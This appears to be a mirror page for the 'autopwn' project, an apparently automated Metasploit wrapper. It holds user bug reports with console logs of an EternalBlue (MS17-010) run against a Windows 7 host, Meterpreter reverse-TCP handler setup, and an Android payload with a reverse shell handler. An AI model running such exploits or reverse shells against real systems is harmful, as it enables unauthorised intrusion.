Giter VIP home page Giter VIP logo

autopwn's People

Contributors

beyarz avatar cstechnergize avatar rpranshu avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

autopwn's Issues

Eternalblue problem

The following options failed to validate: Value '$vip' is not valid for opti                                                                                                                                        on 'RHOST'.

[-] Exploit failed: The following options failed to validate: RHOST.
[*] Exploit completed, but no session was created.
/opt/metasploit-framework/embedded/lib/ruby/gems/2.4.0/gems/activesupport-4.2.10                                                                                                                                        /lib/active_support/core_ext/kernel/agnostics.rb:7:in ``': Cannot allocate memor                                                                                                                                        y - infocmp (Errno::ENOMEM)
        from /opt/metasploit-framework/embedded/lib/ruby/gems/2.4.0/gems/actives                                                                                                                                        upport-4.2.10/lib/active_support/core_ext/kernel/agnostics.rb:7:in ``'
        from /opt/metasploit-framework/embedded/lib/ruby/gems/2.4.0/gems/rb-read                                                                                                                                        line-0.5.5/lib/rbreadline.rb:1815:in `get_term_capabilities'
        from /opt/metasploit-framework/embedded/lib/ruby/gems/2.4.0/gems/rb-read                                                                                                                                        line-0.5.5/lib/rbreadline.rb:2027:in `_rl_init_terminal_io'
        from /opt/metasploit-framework/embedded/lib/ruby/gems/2.4.0/gems/rb-read                                                                                                                                        line-0.5.5/lib/rbreadline.rb:2564:in `readline_initialize_everything'
        from /opt/metasploit-framework/embedded/lib/ruby/gems/2.4.0/gems/rb-read                                                                                                                                        line-0.5.5/lib/rbreadline.rb:3849:in `rl_initialize'
        from /opt/metasploit-framework/embedded/lib/ruby/gems/2.4.0/gems/rb-read                                                                                                                                        line-0.5.5/lib/rbreadline.rb:4868:in `readline'
        from /opt/metasploit-framework/embedded/framework/lib/rex/ui/text/input/                                                                                                                                        readline.rb:162:in `readline_with_output'
        from /opt/metasploit-framework/embedded/framework/lib/rex/ui/text/input/                                                                                                                                        readline.rb:100:in `pgets'
        from /opt/metasploit-framework/embedded/framework/lib/rex/ui/text/shell.                                                                                                                                        rb:375:in `get_input_line'
        from /opt/metasploit-framework/embedded/framework/lib/rex/ui/text/shell.                                                                                                                                        rb:191:in `run'
        from /opt/metasploit-framework/embedded/framework/lib/metasploit/framewo                                                                                                                                        rk/command/console.rb:48:in `start'
        from /opt/metasploit-framework/embedded/framework/lib/metasploit/framewo                                                                                                                                        rk/command/base.rb:82:in `start'
        from /opt/metasploit-framework/bin/../embedded/framework/msfconsole:49:i                                                                                                                                        n `<main>'

Connection reset by peer, Exp Win7 failed

[] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
RHOST => 10.100.128.93
LHOST => 10.100.130.180
PAYLOAD => windows/x64/meterpreter/reverse_tcp
[-] Handler failed to bind to 10.100.130.180:4444:- -
[
] Started reverse TCP handler on 0.0.0.0:4444
[] 10.100.128.93:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.100.128.93:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[
] 10.100.128.93:445 - Scanned 1 of 1 hosts (100% complete)
[+] 10.100.128.93:445 - The target is vulnerable.
[] 10.100.128.93:445 - Connecting to target for exploitation.
[+] 10.100.128.93:445 - Connection established for exploitation.
[+] 10.100.128.93:445 - Target OS selected valid for OS indicated by SMB reply
[
] 10.100.128.93:445 - CORE raw buffer dump (38 bytes)
[] 10.100.128.93:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
[
] 10.100.128.93:445 - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service
[] 10.100.128.93:445 - 0x00000020 50 61 63 6b 20 31 Pack 1
[+] 10.100.128.93:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[
] 10.100.128.93:445 - Trying exploit with 12 Groom Allocations.
[] 10.100.128.93:445 - Sending all but last fragment of exploit packet
[-] 10.100.128.93:445 - Errno::ECONNRESET: Connection reset by peer
[
] Exploit completed, but no session was created.

This err is same to ms17_101_eternalblue in msf. I guess rhost have open FW or AV. What can I attack?

The value specified for PAYLOAD is not valid (LHOST => $ipad)

Now choose your victim`s OS
 Press 1 for android
or
Press 2 for windows
1
[-] No arch selected, selecting arch: dalvik from the payload
No encoder specified, outputting raw payload
Payload size: 10233 bytes

payload $payload created successfully in
/Autopwn
starting the $payload handler.....
This copy of metasploit-framework is more than two weeks old.
 Consider running 'msfupdate' to update to the latest version.
[*] Using configured payload generic/shell_reverse_tcp
LHOST => $ipad
LPORT => 4444
[-] The value specified for PAYLOAD is not valid.
[-] Msf::OptionValidateError The following options failed to validate: LHOST
[*] Exploit completed, but no session was created.
msf6 exploit(multi/handler) >

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.